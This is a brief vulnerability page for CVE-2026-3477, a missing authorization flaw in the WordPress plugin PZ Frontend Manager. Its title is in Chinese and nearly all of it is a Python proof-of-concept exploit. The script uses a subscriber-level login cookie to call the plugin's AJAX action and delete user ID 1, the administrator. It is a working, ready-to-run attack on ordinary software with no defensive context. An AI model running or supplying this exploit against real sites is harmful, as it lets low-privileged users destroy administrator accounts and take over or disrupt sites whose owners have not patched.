CVE-2026-3477: PZ Frontend Manager权限缺失漏洞

import requests # Configuration target_url = "http://example.com/wp-admin/admin-ajax.php" # Cookie of a low-privileged user (e.g., Subscriber) cookies = { "wordpress_logged_in_...": "..." } # Exploit Payload payload = { "action": "pzfm_user_request_action", # The vulnerable AJAX action "dataType": "delete", # Operation to perform "pzfm_user_request": ["1"] # Target User ID to delete (e.g., Admin ID) } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully. Check if user ID 1 is deleted.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")